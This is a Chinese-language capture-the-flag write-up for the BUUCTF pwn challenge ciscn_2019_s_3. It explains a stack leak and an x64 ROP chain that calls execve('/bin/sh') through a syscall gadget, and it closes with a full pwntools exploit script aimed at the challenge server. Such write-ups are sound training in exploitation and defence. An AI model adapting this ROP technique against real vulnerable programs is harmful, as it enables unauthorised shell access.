[BUUCTF-pwn]——ciscn_2019_s_3
peak 小知识
写这道题之前, 大家首先要了解, 想要获得一个shell, 除了system("/bin/sh") 以外, 还有一种更好的方法, 就是系统调用中的 execve("/bin/sh", NULL, NULL)获得shell。我们可以在
Linxu系统调用号表 中找到对应的系统调用号,进行调用, 其中32位程序系统调用号用 eax 储存, 第一 、 二 、 三参数分别在 ebx 、ecx 、edx中储存。 可以用
int 80 汇编指令调用。64位程序系统调用号用 rax 储存, 第一 、 二 、 三参数分别在 rdi 、rsi 、rdx中储存。 可以用
syscall 汇编指令调用。
首先checksec一下,还是老样子只开了NX保护,不过是64位。
在IDA 中,发现了系统调用。
进入汇编看看
ROPgadget找找可能用到的汇编指令
思路
该题是64位程序, execve的系统调用号为0x3b也就是59 。可以发现该程序有两个系统调用第一个 sys_read
和第二个sys_write
,其实和read函数和write函数用法相同。观察vuln函数的汇编指令,我们可以看到,它没有lea指令,也就是说,执行完毕后它的栈不会清空,我们可以将'/bin/sh'
字符串写入buf,计算出buf的地址(rbp - 0x10)就可以在循环调用的时候再次利用。
注意:vuln中没有leave指令,也就是说ebp就是它的返回地址
下面我们要给rax赋值0x3b,将buf的地址,储存到rdi寄存器中,给rsi、rdx寄存器中储存0。我们找到对应的汇编指令组成rop链就好,重点的、需要用到的汇编指令都圈出来了。计算距离的话在pwndbg上面计算就好。
exploit
from pwn import *
p = remote("node3.buuoj.cn",26201)
context.log_level = 'debug'
main_addr=0x0004004ED
execv=0x04004E2
pop_rdi=0x4005a3
pop_rbx_rbp_r12_r13_r14_r15_ret=0x40059A
mov_rdxr13_call=0x0400580
syscall=0x00400517
binsh = '/bin/sh\x00'
payload = binsh.ljust(0x10, 'a') + p64(main_addr)
p.sendline(payload)
p.recv(0x20)
binsh_addr = u64(p.recv(8))-280
print(hex(binsh_addr))
payload = binsh.ljust(0x10, 'a') + p64(pop_rbx_rbp_r12_r13_r14_r15_ret) + p64(0) + p64(0) + p64(binsh_addr+0x50) + p64(0)*2 + p64(1)
payload += p64(mov_rdxr13_call) + p64(execv)
payload += p64(pop_rdi) + p64(binsh_addr) + p64(syscall)
p.sendline(payload)
p.interactive()